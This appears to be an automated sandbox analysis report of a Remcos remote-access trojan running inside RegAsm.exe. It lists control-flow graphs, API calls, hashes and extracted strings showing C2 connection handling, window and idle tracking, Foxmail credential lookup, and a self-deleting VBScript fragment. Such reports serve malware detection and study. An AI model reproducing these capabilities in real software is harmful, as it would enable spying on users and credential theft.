                      • String ID: 8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$PSG$Remcos Agent initialized$Rmc-F4JFYD$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                      • API String ID: 2830904901-1318343205
                      • Opcode ID: f6f2060d4398d5b2a3b696d69963cb1af651a82ed82d656eaac2ebe4ebfc4826
                      • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                      • Opcode Fuzzy Hash: f6f2060d4398d5b2a3b696d69963cb1af651a82ed82d656eaac2ebe4ebfc4826
                      • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 494 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 507 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 494->507 508 414f74-414f7b Sleep 494->508 523 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->523 524 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->524 508->507 577 4150ec-4150f3 523->577 578 4150de-4150ea 523->578 524->523 579 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 577->579 578->579 606 4151d5-4151e3 call 40482d 579->606 607 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 579->607 612 415210-415225 call 404f51 call 4048c8 606->612 613 4151e5-41520b call 402093 * 2 call 41b4ef 606->613 629 415aa3-415ab5 call 404e26 call 4021fa 607->629 612->629 630 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 612->630 613->629 643 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 629->643 644 415add-415ae5 call 401e8d 629->644 694 415380-41538d call 405aa6 630->694 695 415392-4153b9 call 401fab call 4135a6 630->695 643->644 644->523 694->695 701 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 695->701 702 4153bb-4153bd 695->702 947 415a0f-415a16 701->947 702->701 948 415a18-415a1f 947->948 949 415a2a-415a31 947->949 948->949 950 415a21-415a23 948->950 951 415a33-415a38 call 40b051 949->951 952 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 949->952 950->949 951->952 963 415a71-415a7d CreateThread 952->963 964 415a83-415a9e call 401fd8 * 2 call 401f09 952->964 963->964 964->629
                      APIs
                      • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                      • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$ErrorLastLocalTime
                      • String ID: | $%I64u$5.1.0 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$PSG$Rmc-F4JFYD$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                      • API String ID: 524882891-176642185
                      • Opcode ID: 4bf1b6a65238a3b345bfc25c65a6314888a05a94214cc027d76261b0b6abbb94
                      • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                      • Opcode Fuzzy Hash: 4bf1b6a65238a3b345bfc25c65a6314888a05a94214cc027d76261b0b6abbb94
                      • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 971 412ab4-412afd GetModuleFileNameW call 4020df * 3 978 412aff-412b89 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 call 41b978 call 401fab call 40d9e8 call 401fd8 971->978 1003 412b8b-412c1b call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 978->1003 1026 412c2b 1003->1026 1027 412c1d-412c25 Sleep 1003->1027 1028 412c2d-412cbd call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412ccd 1028->1051 1052 412cbf-412cc7 Sleep 1028->1052 1053 412ccf-412d5f call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 418568 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412d61-412d69 Sleep 1053->1076 1077 412d6f-412d94 1053->1077 1076->1053 1076->1077 1078 412d98-412db4 call 401f04 call 41c485 1077->1078 1083 412db6-412dc5 call 401f04 DeleteFileW 1078->1083 1084 412dcb-412de7 call 401f04 call 41c485 1078->1084 1083->1084 1091 412e04 1084->1091 1092 412de9-412e02 call 401f04 DeleteFileW 1084->1092 1094 412e08-412e24 call 401f04 call 41c485 1091->1094 1092->1094 1100 412e26-412e38 call 401f04 DeleteFileW 1094->1100 1101 412e3e-412e40 1094->1101 1100->1101 1103 412e42-412e44 1101->1103 1104 412e4d-412e58 Sleep 1101->1104 1103->1104 1106 412e46-412e4b 1103->1106 1104->1078 1107 412e5e-412e70 call 406b28 1104->1107 1106->1104 1106->1107 1110 412e72-412e80 call 406b28 1107->1110 1111 412ec6-412ee5 call 401f09 * 3 1107->1111 1110->1111 1117 412e82-412e90 call 406b28 1110->1117 1122 412eea-412f23 call 40b904 call 401f04 call 4020f6 call 41322d 1111->1122 1117->1111 1123 412e92-412ebe Sleep call 401f09 * 3 1117->1123 1138 412f28-412f4e call 401f09 call 405b05 1122->1138 1123->978 1137 412ec4 1123->1137 1137->1122 1143 412f54-4130a3 call 41bd1e call 41bb8e call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1143 1144 4130a8-4131a1 call 41bd1e call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1144 1214 4131a5-41322c call 401fd8 call 401f09 call 401fd8 * 9 1143->1214 1144->1214
                      APIs
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CB58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                      • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                      • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                      • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                      • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                      • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                      • Sleep.KERNEL32(00000064), ref: 00412E94
                        • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                      • String ID: /stext "$0TG$0TG$NG$NG
                      • API String ID: 1223786279-2576077980
                      • Opcode ID: d6de413935becafab30e394b160ca22f14f06b8151161aa0688d229eb0e0025f
                      • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                      • Opcode Fuzzy Hash: d6de413935becafab30e394b160ca22f14f06b8151161aa0688d229eb0e0025f
                      • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A

                      Control-flow Graph

                      APIs
                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                        • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                        • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                        • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                        • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                        • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                      • lstrlenW.KERNEL32(?), ref: 100014C5
                      • lstrlenW.KERNEL32(?), ref: 100014E0
                      • lstrlenW.KERNEL32(?,?), ref: 1000150F
                      • lstrcatW.KERNEL32(00000000), ref: 10001521
                      • lstrlenW.KERNEL32(?,?), ref: 10001547
                      • lstrcatW.KERNEL32(00000000), ref: 10001553
                      • lstrlenW.KERNEL32(?,?), ref: 10001579
                      • lstrcatW.KERNEL32(00000000), ref: 10001585
                      • lstrlenW.KERNEL32(?,?), ref: 100015AB
                      • lstrcatW.KERNEL32(00000000), ref: 100015B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                      • String ID: )$Foxmail$ProgramFiles
                      • API String ID: 672098462-2938083778
                      • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                      • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                      • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                      • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                      Control-flow Graph

                      APIs
                      • Sleep.KERNEL32(00001388), ref: 0040A740
                        • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                        • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                        • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                        • Part of subcall function 0040A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                      • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A927
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
                      • String ID: 8SG$8SG$pQG$pQG$PG$PG
                      • API String ID: 110482706-1152054767
                      • Opcode ID: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                      • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                      • Opcode Fuzzy Hash: 9246c906b51f7ef76b321572192bfb08ffa2a7cb594671af2c3c76767c77d2b9
                      • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1384 4048c8-4048e8 connect 1385 404a1b-404a1f 1384->1385 1386 4048ee-4048f1 1384->1386 1389 404a21-404a2f WSAGetLastError 1385->1389 1390 404a97 1385->1390 1387 404a17-404a19 1386->1387 1388 4048f7-4048fa 1386->1388 1391 404a99-404a9e 1387->1391 1392 404926-404930 call 420c60 1388->1392 1393 4048fc-404923 call 40531e call 402093 call 41b4ef 1388->1393 1389->1390 1394 404a31-404a34 1389->1394 1390->1391 1403 404941-40494e call 420e8f 1392->1403 1404 404932-40493c 1392->1404 1393->1392 1397 404a71-404a76 1394->1397 1398 404a36-404a6f call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 1394->1398 1400 404a7b-404a94 call 402093 * 2 call 41b4ef 1397->1400 1398->1390 1400->1390 1418 404950-404973 call 402093 * 2 call 41b4ef 1403->1418 1419 404987-404992 call 421a40 1403->1419 1404->1400 1447 404976-404982 call 420ca0 1418->1447 1430 4049c4-4049d1 call 420e06 1419->1430 1431 404994-4049c2 call 402093 * 2 call 41b4ef call 4210b2 1419->1431 1441 4049d3-4049f6 call 402093 * 2 call 41b4ef 1430->1441 1442 4049f9-404a14 CreateEventW * 2 1430->1442 1431->1447 1441->1442 1442->1387 1447->1390
                      APIs
                      • connect.WS2_32(FFFFFFFF,00F86D08,00000010), ref: 004048E0
                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                      • WSAGetLastError.WS2_32 ref: 00404A21
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                      • API String ID: 994465650-2151626615
                      • Opcode ID: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                      • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                      • Opcode Fuzzy Hash: d7da62a631306c53fd24c0cc8f944035cfa8a700400d4a180607be604b6ae82f
                      • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF

                      Control-flow Graph

                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                      • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                      • closesocket.WS2_32(000000FF), ref: 00404E5A
                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                      • String ID:
                      • API String ID: 2403171778-0
                      • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                      • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                      • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                      • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                      Control-flow Graph

                      APIs
                      • __Init_thread_footer.LIBCMT ref: 0040AD38
                      • Sleep.KERNEL32(000001F4), ref: 0040AD43
                      • GetForegroundWindow.USER32 ref: 0040AD49
                      • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                      • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                      • Sleep.KERNEL32(000003E8), ref: 0040AE54
                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                      • String ID: [${ User has been idle for $ minutes }$]
                      • API String ID: 911427763-3954389425
                      • Opcode ID: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                      • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                      • Opcode Fuzzy Hash: 11deb2e1d1f8f3844bb158fc8ccdcdbeb0aecbc925d29af6944428c3672480c4
                      • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1556 40da34-40da59 call 401f86 1559 40db83-40dc1b call 401f04 GetLongPathNameW call 40417e * 2 call 40ddd1 call 402fa5 * 2 call 401f09 * 5 1556->1559 1560 40da5f 1556->1560 1562 40da70-40da7e call 41b5b4 call 401f13 1560->1562 1563 40da91-40da96 1560->1563 1564 40db51-40db56 1560->1564 1565 40daa5-40daac call 41bfb7 1560->1565 1566 40da66-40da6b 1560->1566 1567 40db58-40db5d 1560->1567 1568 40da9b-40daa0 1560->1568 1569 40db6e 1560->1569 1570 40db5f-40db6c call 43c0cf 1560->1570 1587 40da83 1562->1587 1572 40db73 call 43c0cf 1563->1572 1564->1572 1584 40db00-40db4c call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1565->1584 1585 40daae-40dafe call 40417e call 43c0cf call 40417e call 402fa5 call 401f13 call 401f09 * 2 1565->1585 1566->1572 1567->1572 1568->1572 1569->1572 1570->1569 1586 40db79-40db7e call 409057 1570->1586 1581 40db78 1572->1581 1581->1586 1584->1587 1592 40da87-40da8c call 401f09 1585->1592 1586->1559 1587->1592 1592->1559
                      APIs
                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DB9A
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: LongNamePath
                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                      • API String ID: 82841172-425784914
                      • Opcode ID: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                      • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                      • Opcode Fuzzy Hash: 1365f17b8726d1e4c30e610cfd72c1161db55c192115e3ec262d1ce1c247f70f
                      • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1689 41c3f1-41c402 1690 41c404-41c407 1689->1690 1691 41c41a-41c421 1689->1691 1692 41c410-41c418 1690->1692 1693 41c409-41c40e 1690->1693 1694 41c422-41c43b CreateFileW 1691->1694 1692->1694 1693->1694 1695 41c441-41c446 1694->1695 1696 41c43d-41c43f 1694->1696 1698 41c461-41c472 WriteFile 1695->1698 1699 41c448-41c456 SetFilePointer 1695->1699 1697 41c47f-41c484 1696->1697 1701 41c474 1698->1701 1702 41c476-41c47d FindCloseChangeNotification 1698->1702 1699->1698 1700 41c458-41c45f CloseHandle 1699->1700 1700->1696 1701->1702 1702->1697
                      APIs
                      • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                      • CloseHandle.KERNEL32(00000000), ref: 0041C459
                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 0041C477
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
                      • String ID: hpF
                      • API String ID: 1087594267-151379673
                      • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                      • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                      • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                      • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                      APIs
                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                        • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                        • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                        • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                      • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$CloseCurrentOpenQueryValueWow64
                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                      • API String ID: 782494840-2070987746
                      • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                      • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                      • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                      • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                      APIs
                      • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                      • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                        • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                        • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
